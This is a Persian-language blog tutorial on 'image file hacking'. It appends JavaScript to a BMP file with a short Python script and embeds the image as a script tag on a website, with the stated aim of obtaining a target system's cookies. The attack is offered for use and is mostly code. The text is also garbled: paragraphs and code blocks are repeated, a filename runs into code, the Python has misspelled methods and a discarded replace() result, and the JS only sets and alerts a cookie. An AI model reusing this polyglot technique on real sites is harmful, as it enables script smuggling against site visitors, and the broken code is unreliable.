زبان پایتون ویژگی های قدرتمندی برای کار با فایل ها در اختیار برنامه نویسان قرار میدهد . در سال 2014-2015 در زبان PYTHON ، یک تکنیک برای افزودن کد های مخرب در فایل تصویری - عکس (jpg , jpeg , bmp و ..... ) منتشر شد . خوب ما در قطعه کد زیر با استفاده از چند تا برنامه و چند خط کد جاوا اسکریپت ، به منظور به دست اوردن کوکی های سیستم مقابل
به شما تکنیک image File Hacking رو یاد میدهیم .
( توجه ! این روش در Kali Linux انجام میشود توجه ! )
قسمت هایی که با رنگ زرد نوشته شده رو میتونید با نام دلخواه خود بنویسید
در ابتدا یک فایل تصویری به اسم BlackHacker.bmp بسازید . دو بایت (0x42 0x4d) نخست این فایل Magic-number نامیده میشود که برای تشخیص یک فایل bitmap استفاده میشود .
ترمینال رو باز کنید و دستور زیر رو تایپ کنید :
به شما تکنیک image File Hacking رو یاد میدهیم .
( توجه ! این روش در Kali Linux انجام میشود توجه ! )
قسمت هایی که با رنگ زرد نوشته شده رو میتونید با نام دلخواه خود بنویسید
در ابتدا یک فایل تصویری به اسم BlackHacker.bmp بسازید . دو بایت (0x42 0x4d) نخست این فایل Magic-number نامیده میشود که برای تشخیص یک فایل bitmap استفاده میشود .
ترمینال رو باز کنید و دستور زیر رو تایپ کنید :
root@Kali: apt-get install bless; bless BlackHacker.bmp
name='id';
value = 'Amir-Baharvandi'
var todayDate = new Date();
todayDate.setHours(todayDate.getDate() + 7);
document.cookie = name + "=" + escape( value ) + "; path=/;
expires=" + todayDate.toGMTString() + "";
alert(document.cookie)
حالا با استفاده از ترمینال کد های زیر در فایل تصویری خودمون اضافه میکنیم .
root@Kali: chmod 777 BlackHacker.bmp ; vi BlackHacker.jsname='id';
value = 'Amir-Baharvandi'
var todayDate = new Date();
todayDate.setHours(todayDate.getDate() + 7);
document.cookie = name + "=" + escape( value ) + "; path=/;
expires=" + todayDate.toGMTString() + "";
alert(document.cookie)
حالا باید یک برنامه به زبان پایتون بنویسیم که محتویات اسکریپت BlackHacker.js رو به فایل BlackHacker.bmp اضافه کنه :
root@Kali: vi imagehacking.py
fname = "BlackHacker.bmp"
pfile = open (fname, "r+b")
buff = pfile.read()
buff.replace(b'\x2A\x2F', b'\x00\x00')
pfile.close()
pfile = open(fname, "w+b")
pfile.whrite(buff)
pfile.seek(2,0)
pfile.whrite(b'\x2F\x2A')
pfile.close()
pfile = open(fname, 'a+b')
pfile.whrite(open ('BlackHacker.js' ,'rb').read() )
pfile.close()
fname = "BlackHacker.bmp"
pfile = open (fname, "r+b")
buff = pfile.read()
buff.replace(b'\x2A\x2F', b'\x00\x00')
pfile.close()
pfile = open(fname, "w+b")
pfile.whrite(buff)
pfile.seek(2,0)
pfile.whrite(b'\x2F\x2A')
pfile.close()
pfile = open(fname, 'a+b')
pfile.whrite(open ('BlackHacker.js' ,'rb').read() )
pfile.close()
حالا فایل تصویری خودتون رو در کنار قالب سایتتون آپلود کنید و کد های زیر رو در قالب سایتتون بنویسید :
<img src="BlackHacker.bmp"/>
<script src="BlackHacker.bmp"></script>
<script src="BlackHacker.bmp"></script>
موفق باشید
IT-VIDEO.BLOG.IR
IT-VIDEO.BLOG.IR
